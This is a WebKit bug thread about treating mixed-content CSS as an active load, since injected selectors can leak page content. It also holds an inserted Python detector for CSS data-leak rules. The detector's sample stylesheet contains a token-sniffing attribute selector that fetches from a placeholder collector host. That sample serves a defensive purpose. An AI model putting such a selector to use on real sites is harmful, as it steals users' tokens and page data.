Bug 59056

Summary: Upgrade CSS loads from mixed content warning (displayed) to mixed content error (ran)
Product: WebKit Reporter: Chris Evans <cevans>
Component: CSS Assignee: Chris Evans <cevans>
Severity: Normal CC: abarth, commit-queue, sam
Priority: P2    
Version: 528+ (Nightly build)   
Hardware: PC   
OS: OS X 10.5   
Description Flags
abarth: review+
Patch none

Description Chris Evans 2011-04-20 18:10:50 PDT
The reason is that CSS3 selectors injected into a document via mixed-content load can in fact query, retrieve and egress the document content. That's serious (unlike mixed content image loads and frame loads).
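An added example, not part of the original bug report or the WebKit patch: a defender-side heuristic that audits a stylesheet for the pattern the description refers to, where a selector that tests an attribute value gates a fetch to a remote URL. The function name, the regular expressions and the sample stylesheet are all constructed for illustration.

```python
import re

# Attribute selectors that test a value: [a=v] [a^=v] [a$=v] [a*=v] [a~=v] [a|=v]
ATTR_VALUE_SELECTOR = re.compile(r"\[\s*[\w-]+\s*[\^$*~|]?=\s*[^\]]+\]")
# url(...) pointing at an absolute or scheme-relative (remote) target
REMOTE_URL = re.compile(r"url\(\s*['\"]?\s*((?:https?:)?//[^'\")\s]+)", re.I)
# Innermost "selector { declarations }" blocks; also matches rules nested in @media
RULE = re.compile(r"([^{}]+)\{([^{}]*)\}")
COMMENT = re.compile(r"/\*.*?\*/", re.S)


def find_leaky_rules(css_text):
    """Return (selector, url) pairs where matching on an attribute value
    triggers a network request, so the request reveals the matched value."""
    findings = []
    css = COMMENT.sub("", css_text)  # commented-out rules never apply
    for match in RULE.finditer(css):
        selector, body = match.group(1).strip(), match.group(2)
        if not ATTR_VALUE_SELECTOR.search(selector):
            continue
        for url in REMOTE_URL.findall(body):
            findings.append((selector, url))
    return findings


# Constructed sample stylesheet (hosts are placeholders under .example)
SAMPLE_CSS = '''
body { background: url(//static.example/bg.png); }
a[href^="http"] { color: blue; }
input[name="token"][value^="a"] { background-image: url("http://collector.example/?p=a"); }
/* input[value$="z"] { background: url(http://x.example/z) } */
'''

if __name__ == "__main__":
    for selector, url in find_leaky_rules(SAMPLE_CSS):
        print(f"value-dependent fetch: {selector} -> {url}")
```

A hit is a lead for review rather than proof of abuse, since legitimate themes also style elements by attribute value.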
Comment 2 Chris Evans 2011-04-20 18:22:39 PDT
Created attachment 90465 [details]
Comment 3 Adam Barth 2011-04-20 18:45:19 PDT
Comment on attachment 90465 [details]

View in context: https://bugs.webkit.org/attachment.cgi?id=90465&action=review

Let's give Sam a chance to see this patch too.

> Source/WebCore/loader/cache/CachedResourceLoader.cpp:238
> +        // XSL) or recover the content of the current document (CSS).
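Review bot: the comment at Source/WebCore/loader/cache/CachedResourceLoader.cpp:238 uses "recover" for what CSS can do with the current document, which can be read as restoring content rather than leaking it. A verb that names the outflow (for example "exfiltrate") would state the risk directly. The comment could also say that the channel is selector matching against document content, as the bug description explains, so that the reason CSS is listed alongside XSL is clear from the code alone.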

recover?  maybe exfiltrate ?
Comment 4 Chris Evans 2011-04-22 15:44:54 PDT
Exfiltrate it is. Landing.

Chatted to Sam out-of-band.
He raised the interesting point of naming -- do "run" and "display" cover it well any more? I can be persuaded that they still do, because I see the ever-more powerful CSS as more like running a language than displaying pixels.
But if you have any better naming ideas, I can uptake them on the next patch.
Comment 5 Chris Evans 2011-04-22 15:45:35 PDT
Created attachment 90785 [details]
Comment 6 Adam Barth 2011-04-22 17:33:28 PDT
I'm not sure whether those are the best names.  What did you have in mind?
Comment 7 Chris Evans 2011-04-22 18:00:58 PDT
I don't have any great ideas at this time. Sam?
Comment 8 WebKit Commit Bot 2011-04-22 21:04:29 PDT
Comment on attachment 90785 [details]

Rejecting attachment 90785 [details] from commit-queue.

Failed to run "['./Tools/Scripts/webkit-patch', '--status-host=queues.webkit.org', '--bot-id=cr-jail-3', 'land-a..." exit_code: 1

Last 500 characters of output:
Processing 1 patch from 1 bug.
Cleaning working directory
Updating working directory
Processing patch 90785 from bug 59056.
NOBODY (OOPS!) found in /mnt/git/webkit-commit-queue/LayoutTests/ChangeLog does not appear to be a valid reviewer according to committers.py.
ERROR: /mnt/git/webkit-commit-queue/LayoutTests/ChangeLog neither lists a valid reviewer nor contains the string "Unreviewed" or "Rubber stamp" (case insensitive).
Updating OpenSource
Current branch master is up to date.

Full output: http://queues.webkit.org/results/8494732
Comment 9 Adam Barth 2011-04-22 21:19:17 PDT
Comment on attachment 90785 [details]

If you post a patch with commit-queue+, you need to fill in the reviewer yourself because the tools don't know who reviewed the patch. The command "webkit-patch land-safely" will do that automatically for you.
Comment 10 WebKit Commit Bot 2011-04-22 22:54:39 PDT
The commit-queue encountered the following flaky tests while processing attachment 90785 [details]:

http/tests/appcache/reload.html bug 59275
The commit-queue is continuing to process your patch.
Comment 11 WebKit Commit Bot 2011-04-22 22:55:46 PDT
Comment on attachment 90785 [details]

Clearing flags on attachment: 90785

Committed r84739: <http://trac.webkit.org/changeset/84739>
Comment 12 WebKit Commit Bot 2011-04-22 22:55:51 PDT
All reviewed patches have been landed.  Closing bug.